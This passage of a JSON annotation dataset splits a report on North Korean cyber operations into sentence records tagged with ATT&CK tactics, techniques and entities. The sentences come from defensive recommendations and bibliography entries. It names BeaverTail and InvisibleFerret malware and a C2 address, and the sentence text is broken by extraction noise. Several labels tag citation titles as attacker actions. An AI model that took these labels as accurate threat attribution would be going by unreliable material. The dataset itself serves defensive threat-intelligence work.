"mitre", "doc_id": "79_mitre_report", "page_number": 48, "sentence_id": 342, "context_before": "These actors function as one HIDDEN enterprise in support of regime priorities—and they must be understood and AND countered as such.\nSYNDICATE\nCYBER\nDPRK’S\nEXPOSING", "sentence_text": "Immediate Steps to Counter the DPRK Insider Threat Security leaders must take immediate and concrete steps:\n• Review existing internal and external personnel with access to sensitive systems—including remote or contract workers—swiftly removing suspected DPRK operatives where appropriate.\nProtective Measures:\nPre-Employment Post-Employment\n› Require cameras on to confirm identity › Monitor for unauthorized remote access and observe background indicators.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p48-s343-54a5d3", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 48, "sentence_id": 343, "context_before": "Immediate Steps to Counter the DPRK Insider Threat Security leaders must take immediate and concrete steps:\n• Review existing internal and external personnel with access to sensitive systems—including remote or contract workers—swiftly removing suspected DPRK operatives where appropriate.\nProtective Measures:\nPre-Employment Post-Employment\n› Require cameras on to confirm identity › Monitor for unauthorized remote access and observe background indicators.", "sentence_text": "tools; monitor endpoint activity › Watch for signs of cheating (e.g., long outside company hours.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p48-s344-b1aa0a", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 48, "sentence_id": 344, "context_before": "tools; monitor endpoint activity › Watch for signs of cheating (e.g., long outside company hours.", "sentence_text": "pauses, eye-scanning movements).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p48-s345-49e4da", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 48, "sentence_id": 345, "context_before": "pauses, eye-scanning movements).", "sentence_text": "› Track browser use for VDI access and › Verify geolocation through call logs and multiple email aliases.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p48-s346-459e54", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 48, "sentence_id": 346, "context_before": "› Track browser use for VDI access and › Verify geolocation through call logs and multiple email aliases.", "sentence_text": "Zoom login IP addresses.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p48-s347-bcc262", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 48, "sentence_id": 347, "context_before": "Zoom login IP addresses.", "sentence_text": "identity verification.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p48-s348-cefe0d", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 48, "sentence_id": 348, "context_before": "identity verification.", "sentence_text": "› Monitor leavers for extortion attempts, › Assist HR in validating technical ransomware, or severance exploitation experience claims and randomizing encouraged by overwork communities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p48-s349-9a872d", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 48, "sentence_id": 349, "context_before": "› Monitor leavers for extortion attempts, › Assist HR in validating technical ransomware, or severance exploitation experience claims and randomizing encouraged by overwork communities.", "sentence_text": "interview questions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p48-s350-ffef53", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 48, "sentence_id": 350, "context_before": "interview questions.", "sentence_text": "48 › Include HR in security briefings and For the latest DPRK-linked behavioral indicators threat awareness sessions.\nand email IOCs, visit dtexsystems.com/ resources/i3-threat-advisory-inside-the-dprk/ WORKFORCE IT HIDDEN • Invest in tooling and technology that enables behavioral monitoring, identity validation, and early insider AND risk detection.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p48-s351-f67075", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 48, "sentence_id": 351, "context_before": "48 › Include HR in security briefings and For the latest DPRK-linked behavioral indicators threat awareness sessions.\nand email IOCs, visit dtexsystems.com/ resources/i3-threat-advisory-inside-the-dprk/ WORKFORCE IT HIDDEN • Invest in tooling and technology that enables behavioral monitoring, identity validation, and early insider AND risk detection.", "sentence_text": "The right infrastructure doesn’t just help respond to threats—it helps anticipate and mitigate them.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p48-s353-5b2df8", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 48, "sentence_id": 353, "context_before": "CYBER •", "sentence_text": "Report suspicious activity through trusted channels such as the Defense Cyber Crime Center (DC3) (www.\ndc3.mil) and the FBI’s Internet Crime Complaint Center (www.ic3.gov).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p48-s354-82b3c8", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 48, "sentence_id": 354, "context_before": "Report suspicious activity through trusted channels such as the Defense Cyber Crime Center (DC3) (www.\ndc3.mil) and the FBI’s Internet Crime Complaint Center (www.ic3.gov).", "sentence_text": "DPRK’S • Drive collaboration across sectors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p48-s355-e2ca55", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 48, "sentence_id": 355, "context_before": "DPRK’S • Drive collaboration across sectors.", "sentence_text": "Disrupting DPRK operations requires visibility and speed that no one entity can achieve alone.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p48-s356-6f063f", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 48, "sentence_id": 356, "context_before": "Disrupting DPRK operations requires visibility and speed that no one entity can achieve alone.", "sentence_text": "The future of defense against DPRK cyber operations will", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p49-s357-db81ca", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 49, "sentence_id": 357, "context_before": "The future of defense against DPRK cyber operations will", "sentence_text": "not be won with technology alone.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p49-s358-97adb0", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 49, "sentence_id": 358, "context_before": "not be won with technology alone.", "sentence_text": "This is the moment for leadership to act.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p49-s359-54adc3", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 49, "sentence_id": 359, "context_before": "This is the moment for leadership to act.", "sentence_text": "The threat is evolving.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p49-s360-de5b1e", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 49, "sentence_id": 360, "context_before": "The threat is evolving.", "sentence_text": "Our response must too.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p49-s361-24be5b", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 49, "sentence_id": 361, "context_before": "Our response must too.", "sentence_text": "WORKFORCE\nIT\nHIDDEN\nAND\nSYNDICATE\nCYBER\nDPRK’S\nEXPOSING", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p50-s362-71b9e7", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 50, "sentence_id": 362, "context_before": "WORKFORCE\nIT\nHIDDEN\nAND\nSYNDICATE\nCYBER\nDPRK’S\nEXPOSING", "sentence_text": "Sources\nJeong Tae Joo, “Mecca for North Korean Hackers,” Daily NK, March 12, 2025, https://www.dailynk.com/english/ mecca-for-north-korean-hackers/ “How North Korea Recruits, Trains and Deploys Its Army of Hackers,” NBC News, December 20, 2017, https://www.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Recruits, trains, and deploys army of hackers", "entities": [ { "text": "North Korean Hackers", "start": 34, "end": 54, "label": "ThreatActor" }, { "text": "Trains ", "start": 175, "end": 182, "label": "Action" }, { "text": "Recruits", "start": 165, "end": 173, "label": "Action" }, { "text": "Deploys ", "start": 186, "end": 194, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p50-s363-9c186d", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 50, "sentence_id": 363, "context_before": "Sources\nJeong Tae Joo, “Mecca for North Korean Hackers,” Daily NK, March 12, 2025, https://www.dailynk.com/english/ mecca-for-north-korean-hackers/ “How North Korea Recruits, Trains and Deploys Its Army of Hackers,” NBC News, December 20, 2017, https://www.", "sentence_text": "nbcnews.com/news/north-korea/how-north-korea-recruits-trains-its-army-hackers-n825521\nSangwon Yoon, “North Korea Recruits Hackers at School,” Al Jazeera, June 20, 2011, https://www.aljazeera.com/ features/2011/6/20/north-korea-recruits-hackers-at-school Insikt Group, “North Korea’s Cyber Strategy,” Recorded Future, June 23, 2023, https://www.recordedfuture.com/ research/north-koreas-cyber-strategy Cybersecurity and Infrastructure Security Agency, “North Korea Cyber Group Conducts Global Espionage Campaign to Advance Regime’s Military and Nuclear Programs,” Cybersecurity Advisory AA24-207A, July 25, 2024, https:// Jeong Tae Joo, “N. Korea Ramps Up Cyber Offensive: New Research Center to Focus on AI-Powered Hacking,” Daily NK, March 12, 2025, https://www.dailynk.com/english/n-korea-ramps-up-cyber-offensive-new-research-center-to- focus-on-ai-powered-hacking/ Elisabeth Suh, “North Korea’s Cyber Capabilities and Strategy,” German Council on Foreign Relations (DGAP), January 7, 2022, https://dgap.org/en/research/publications/north-koreas-cyber-capabilities-and-strategy-0 United Nations Security Council, “Letter Dated 6 March 2023 from the Panel of Experts Established Pursuant to Resolution 1874 (2009)", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" }, { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" }, { "id": "T1591", "name": "Gather Victim Org Information" } ], "procedure": "Recruits hackers, ramps up cyber offensive with AI-powered hacking, conducts global espionage for military/nuclear programs", "entities": [ { "text": "North Korea ", "start": 101, "end": 113, "label": "ThreatActor" }, { "text": "AI-Powered Hacking", "start": 704, "end": 722, "label": "Infrastructure_Indicator" }, { "text": "Military and Nuclear Programs", "start": 531, "end": 560, "label": "Infrastructure_Indicator" }, { "text": "Recruits ", "start": 113, "end": 122, "label": "Action" }, { "text": "Ramps Up Cyber Offensive", "start": 646, "end": 670, "label": "Action" }, { "text": "Conducts Global Espionage", "start": 476, "end": 501, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p50-s364-79c668", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 50, "sentence_id": 364, "context_before": "nbcnews.com/news/north-korea/how-north-korea-recruits-trains-its-army-hackers-n825521\nSangwon Yoon, “North Korea Recruits Hackers at School,” Al Jazeera, June 20, 2011, https://www.aljazeera.com/ features/2011/6/20/north-korea-recruits-hackers-at-school Insikt Group, “North Korea’s Cyber Strategy,” Recorded Future, June 23, 2023, https://www.recordedfuture.com/ research/north-koreas-cyber-strategy Cybersecurity and Infrastructure Security Agency, “North Korea Cyber Group Conducts Global Espionage Campaign to Advance Regime’s Military and Nuclear Programs,” Cybersecurity Advisory AA24-207A, July 25, 2024, https:// Jeong Tae Joo, “N. Korea Ramps Up Cyber Offensive: New Research Center to Focus on AI-Powered Hacking,” Daily NK, March 12, 2025, https://www.dailynk.com/english/n-korea-ramps-up-cyber-offensive-new-research-center-to- focus-on-ai-powered-hacking/ Elisabeth Suh, “North Korea’s Cyber Capabilities and Strategy,” German Council on Foreign Relations (DGAP), January 7, 2022, https://dgap.org/en/research/publications/north-koreas-cyber-capabilities-and-strategy-0 United Nations Security Council, “Letter Dated 6 March 2023 from the Panel of Experts Established Pursuant to Resolution 1874 (2009)", "sentence_text": "un.org/en/S/2023/171\nInsikt Group, “Despite Sanctions, North Koreans Continue to Use Foreign Technology,” Recorded Future, July 18, 2024, https://www.recordedfuture.com/research/north-koreans-continue-to-use-foreign-technology Jason Bartlett, “Mapping Major Milestones in the Evolution of North Korea’s Cyber Program,” The Diplomat, July 18, 2022, https://thediplomat.com/2022/07/mapping-major-milestones-in-the-evolution-of-north-koreas-cyber- WORKFORCE program/", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588", "name": "Obtain Capabilities" } ], "procedure": "Uses foreign technology despite sanctions", "entities": [ { "text": "North Koreans ", "start": 55, "end": 69, "label": "ThreatActor" }, { "text": "Foreign Technology", "start": 85, "end": 103, "label": "Infrastructure_Indicator" }, { "text": "North Korea", "start": 289, "end": 300, "label": "ThreatActor" }, { "text": "Use ", "start": 81, "end": 85, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p50-s365-1b606e", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 50, "sentence_id": 365, "context_before": "un.org/en/S/2023/171\nInsikt Group, “Despite Sanctions, North Koreans Continue to Use Foreign Technology,” Recorded Future, July 18, 2024, https://www.recordedfuture.com/research/north-koreans-continue-to-use-foreign-technology Jason Bartlett, “Mapping Major Milestones in the Evolution of North Korea’s Cyber Program,” The Diplomat, July 18, 2022, https://thediplomat.com/2022/07/mapping-major-milestones-in-the-evolution-of-north-koreas-cyber- WORKFORCE program/", "sentence_text": "IT Hyuk Kim, “North Korea’s International Network for Artificial Intelligence Research,” 38 North, August 21, 2024, HIDDEN AND Hyuk Kim, “North Korea’s Artificial Intelligence Research: Trends and Potential Civilian and Military Applications,” 38 North, January 23, 2024, https://www.38north.org/2024/01/north-koreas-artificial-intelligence-research-trends- and-potential-civilian-and-military-applications/ SYNDICATE Lee Sang Yong and Hwang Hyun-uk, “Digital Warfare: N. Korea’s Evolving Cyber Arsenal and Global Threats,” Daily CYBER NK, March 28, 2025, https://www.dailynk.com/english/digital-warfare-north-korea-evolving-cyber-arsenal-global- threats/ DPRK’S Office of Foreign Assets Control, “Guidance on the Democratic People’s Republic of Korea Information Technology Workers,” U.S. Department of the Treasury, November 2022, https://ofac.treasury.gov/media/923126/download?inline= EXPOSING", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Evolves cyber arsenal and conducts AI research for global threats", "entities": [ { "text": "North Korea", "start": 14, "end": 25, "label": "ThreatActor" }, { "text": "North Korea", "start": 138, "end": 149, "label": "ThreatActor" }, { "text": "Artificial Intelligence Research", "start": 54, "end": 86, "label": "Infrastructure_Indicator" }, { "text": " Cyber Arsenal ", "start": 488, "end": 503, "label": "Infrastructure_Indicator" }, { "text": "Global Threats", "start": 507, "end": 521, "label": "Action" }, { "text": "Evolving ", "start": 480, "end": 489, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p51-s366-1b5180", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 51, "sentence_id": 366, "context_before": "IT Hyuk Kim, “North Korea’s International Network for Artificial Intelligence Research,” 38 North, August 21, 2024, HIDDEN AND Hyuk Kim, “North Korea’s Artificial Intelligence Research: Trends and Potential Civilian and Military Applications,” 38 North, January 23, 2024, https://www.38north.org/2024/01/north-koreas-artificial-intelligence-research-trends- and-potential-civilian-and-military-applications/ SYNDICATE Lee Sang Yong and Hwang Hyun-uk, “Digital Warfare: N. Korea’s Evolving Cyber Arsenal and Global Threats,” Daily CYBER NK, March 28, 2025, https://www.dailynk.com/english/digital-warfare-north-korea-evolving-cyber-arsenal-global- threats/ DPRK’S Office of Foreign Assets Control, “Guidance on the Democratic People’s Republic of Korea Information Technology Workers,” U.S. Department of the Treasury, November 2022, https://ofac.treasury.gov/media/923126/download?inline= EXPOSING", "sentence_text": "Hayato Sasaki, “Tempted to Classify APT Actors: Practical Challenges of Attribution in the Case of Lazarus’s Subgroup,” JPCERT/CC Eyes, March 25, 2025, https://blogs.jpcert.or.jp/en/2025/03/classifying-lazaruss-subgroup.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p51-s367-62b90d", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 51, "sentence_id": 367, "context_before": "Hayato Sasaki, “Tempted to Classify APT Actors: Practical Challenges of Attribution in the Case of Lazarus’s Subgroup,” JPCERT/CC Eyes, March 25, 2025, https://blogs.jpcert.or.jp/en/2025/03/classifying-lazaruss-subgroup.", "sentence_text": "html\nDan Goodin, “Gemini Hackers Can Deliver More Potent Attacks with a Helping Hand from Gemini,” Ars Technica, March 2025, https://arstechnica.com/security/2025/03/gemini-hackers-can-deliver-more-potent-attacks-with-a- helping-hand-from-gemini/ sleet-emerges-as-new-north-korean-threat-actor-with-new-bag-of-tricks/ Jeong Tae Joo, “N. Korea Doubles Foreign Currency Quotas for Overseas Workers,” Daily NK, March 25, 2025, https:// Jeong Tae Joo, “N. Korea Ramps Up Cyber Offensive: New Research Center to Focus on AI-Powered Hacking,” Daily NK, March 12, 2025, https://www.dailynk.com/english/n-korea-ramps-up-cyber-offensive-new-research-center-to- focus-on-ai-powered-hacking/ Lawrence Abrams, “CryptoCore Hackers Made Over $200M Breaching Crypto Exchanges,” BleepingComputer, June 24, 2020, https://www.bleepingcomputer.com/news/security/cryptocore-hackers-made-over-200m-breaching- crypto-exchanges/ United States v. Park Jin Hyok.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1657", "name": "Financial Theft" }, { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Delivers potent attacks, doubles foreign currency quotas, ramps up AI-powered cyber offensive, breaches crypto exchanges", "entities": [ { "text": "Gemini Hackers", "start": 18, "end": 32, "label": "ThreatActor" }, { "text": "CryptoCore Hackers", "start": 699, "end": 717, "label": "ThreatActor" }, { "text": "N. Korea", "start": 449, "end": 457, "label": "ThreatActor" }, { "text": "Park Jin Hyok", "start": 923, "end": 936, "label": "ThreatActor" }, { "text": "Attacks ", "start": 57, "end": 65, "label": "Action" }, { "text": "Doubles Foreign Currency Quotas", "start": 343, "end": 374, "label": "Action" }, { "text": "Ramps Up Cyber Offensive", "start": 458, "end": 482, "label": "Action" }, { "text": "Breaching ", "start": 734, "end": 744, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p51-s368-8dc8b4", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 51, "sentence_id": 368, "context_before": "html\nDan Goodin, “Gemini Hackers Can Deliver More Potent Attacks with a Helping Hand from Gemini,” Ars Technica, March 2025, https://arstechnica.com/security/2025/03/gemini-hackers-can-deliver-more-potent-attacks-with-a- helping-hand-from-gemini/ sleet-emerges-as-new-north-korean-threat-actor-with-new-bag-of-tricks/ Jeong Tae Joo, “N. Korea Doubles Foreign Currency Quotas for Overseas Workers,” Daily NK, March 25, 2025, https:// Jeong Tae Joo, “N. Korea Ramps Up Cyber Offensive: New Research Center to Focus on AI-Powered Hacking,” Daily NK, March 12, 2025, https://www.dailynk.com/english/n-korea-ramps-up-cyber-offensive-new-research-center-to- focus-on-ai-powered-hacking/ Lawrence Abrams, “CryptoCore Hackers Made Over $200M Breaching Crypto Exchanges,” BleepingComputer, June 24, 2020, https://www.bleepingcomputer.com/news/security/cryptocore-hackers-made-over-200m-breaching- crypto-exchanges/ United States v. Park Jin Hyok.", "sentence_text": "“The Many Personalities of Lazarus.”", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p51-s369-c79f6d", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 51, "sentence_id": 369, "context_before": "“The Many Personalities of Lazarus.”", "sentence_text": "Risky Business, March 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p51-s370-253e86", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 51, "sentence_id": 370, "context_before": "Risky Business, March 2024.", "sentence_text": "“The All-Purpose Sword: North Korea’s Cyber Operations and Strategies.”", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p51-s371-cd6e24", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 51, "sentence_id": 371, "context_before": "“The All-Purpose Sword: North Korea’s Cyber Operations and Strategies.”", "sentence_text": "NATO Cooperative Cyber Defence Centre of Excellence, 2019.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p51-s372-a3dadc", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 51, "sentence_id": 372, "context_before": "NATO Cooperative Cyber Defence Centre of Excellence, 2019.", "sentence_text": "“Treasury Sanctions North Korean State-Sponsored Malicious Cyber Groups.”", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p51-s373-a41cc1", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 51, "sentence_id": 373, "context_before": "“Treasury Sanctions North Korean State-Sponsored Malicious Cyber Groups.”", "sentence_text": "Gwangju News, July 2013.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p51-s374-5277d7", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 51, "sentence_id": 374, "context_before": "Gwangju News, July 2013.", "sentence_text": "“North Korea’s Cyber Operations: Strategy and Responses.”", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p51-s375-97c861", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 51, "sentence_id": 375, "context_before": "“North Korea’s Cyber Operations: Strategy and Responses.”", "sentence_text": "Center for Strategic and International HIDDEN Studies, December 2015.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p51-s376-a678fc", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 51, "sentence_id": 376, "context_before": "Center for Strategic and International HIDDEN Studies, December 2015.", "sentence_text": "“North Korea Military Power: A Growing Regional and Global Threat.”", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p51-s377-5f486b", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 51, "sentence_id": 377, "context_before": "“North Korea Military Power: A Growing Regional and Global Threat.”", "sentence_text": "Sky News, July 2013.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p51-s378-8936bc", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 51, "sentence_id": 378, "context_before": "Sky News, July 2013.", "sentence_text": "“Forks in the Road to Reform: Socio-Economic Changes under Kim Jong Un.”", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p51-s379-1b4057", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 51, "sentence_id": 379, "context_before": "“Forks in the Road to Reform: Socio-Economic Changes under Kim Jong Un.”", "sentence_text": "un_glyn-ford EXPOSING", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p52-s380-ffbbcc", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 52, "sentence_id": 380, "context_before": "un_glyn-ford EXPOSING", "sentence_text": "Jang, Seulkee.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p52-s381-8ccef5", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 52, "sentence_id": 381, "context_before": "Jang, Seulkee.", "sentence_text": "“Kim Jong Un Is Directly Handling Results of New COVID-19 Hacking Organization’s Work.”", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p52-s382-8db6bb", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 52, "sentence_id": 382, "context_before": "“Kim Jong Un Is Directly Handling Results of New COVID-19 Hacking Organization’s Work.”", "sentence_text": "“Smuggling Malware in Test Code.”", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p52-s383-227255", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 52, "sentence_id": 383, "context_before": "“Smuggling Malware in Test Code.”", "sentence_text": "Phylum Blog, February 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p52-s384-8c546a", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 52, "sentence_id": 384, "context_before": "Phylum Blog, February 2024.", "sentence_text": "“The actor continues with familiar tactics, incorporating a cleverly obfuscated BeaverTail script.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Incorporating a cleverly obfuscated BeaverTail script", "entities": [ { "text": "incorporating ", "start": 44, "end": 58, "label": "Action" }, { "text": "The actor", "start": 1, "end": 10, "label": "ThreatActor" }, { "text": "BeaverTail script", "start": 80, "end": 97, "label": "MalwareTool" } ] }, { "uid": "mitre-79_mitre_report-p52-s385-7e361e", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 52, "sentence_id": 385, "context_before": "“The actor continues with familiar tactics, incorporating a cleverly obfuscated BeaverTail script.", "sentence_text": "The endgame remains the InvisibleFerret script, with the C2 using IP addresses previously employed by the actor:\n147.124.212.89:1244.”", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "Using C2 at IP address 147.124.212.89:1244 for the InvisibleFerret script", "entities": [ { "text": " InvisibleFerret script", "start": 23, "end": 46, "label": "MalwareTool" }, { "text": "C2 ", "start": 57, "end": 60, "label": "Infrastructure_Indicator" }, { "text": "147.124.212.89:1244", "start": 113, "end": 132, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-79_mitre_report-p52-s387-eba966", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 52, "sentence_id": 387, "context_before": "X, December 2023.", "sentence_text": "“Obfuscated code a ‘recruiter’ sent me.”", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p52-s389-a763b4", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 52, "sentence_id": 389, "context_before": "Reddit, December 2023.", "sentence_text": "“Blockchain dev’s wallet emptied in ‘job interview’ using npm package.”", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p52-s392-787d33", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 52, "sentence_id": 392, "context_before": "FreeBuf, May 2024.", "sentence_text": "“North Korea Still Attacking Developers via npm.”", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1195", "name": "Supply Chain Compromise" } ], "procedure": "Attacking developers via npm", "entities": [ { "text": "North Korea", "start": 1, "end": 12, "label": "ThreatActor" }, { "text": "Attacking Developers", "start": 19, "end": 39, "label": "Action" }, { "text": "npm", "start": 44, "end": 47, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-79_mitre_report-p52-s393-a5ff10", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 52, "sentence_id": 393, "context_before": "“North Korea Still Attacking Developers via npm.”", "sentence_text": "Phylum Blog, August 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p52-s394-f35379", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 52, "sentence_id": 394, "context_before": "Phylum Blog, August 2024.", "sentence_text": "“It is safe to say it is a North Korean Op.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p52-s395-df5f32", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 52, "sentence_id": 395, "context_before": "“It is safe to say it is a North Korean Op.", "sentence_text": "Threat Actor: North Korean Cluster Context.”", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p52-s397-5d6f75", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 52, "sentence_id": 397, "context_before": "X, April 2025.", "sentence_text": "User @asdasd13asbz.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p52-s398-798367", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 52, "sentence_id": 398, "context_before": "User @asdasd13asbz.", "sentence_text": "“The Lazarus group appears to be currently reaching out to targets via LinkedIn and spreading malware.”", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Reaches out to targets via LinkedIn and spreads malware", "entities": [ { "text": "Lazarus group", "start": 5, "end": 18, "label": "ThreatActor" }, { "text": "LinkedIn ", "start": 71, "end": 80, "label": "Infrastructure_Indicator" }, { "text": " reaching out", "start": 42, "end": 55, "label": "Action" }, { "text": "spreading malware", "start": 84, "end": 101, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p52-s401-11e8b4", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 52, "sentence_id": 401, "context_before": "LinkedIn, April 2025.", "sentence_text": "https://linkedin.\ncom/posts/abhisheksinghsoni_blockchainsecurity-cryptoscamalert-defijobs-activity-7127542067001475073-71xU/\n0x50D4.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": 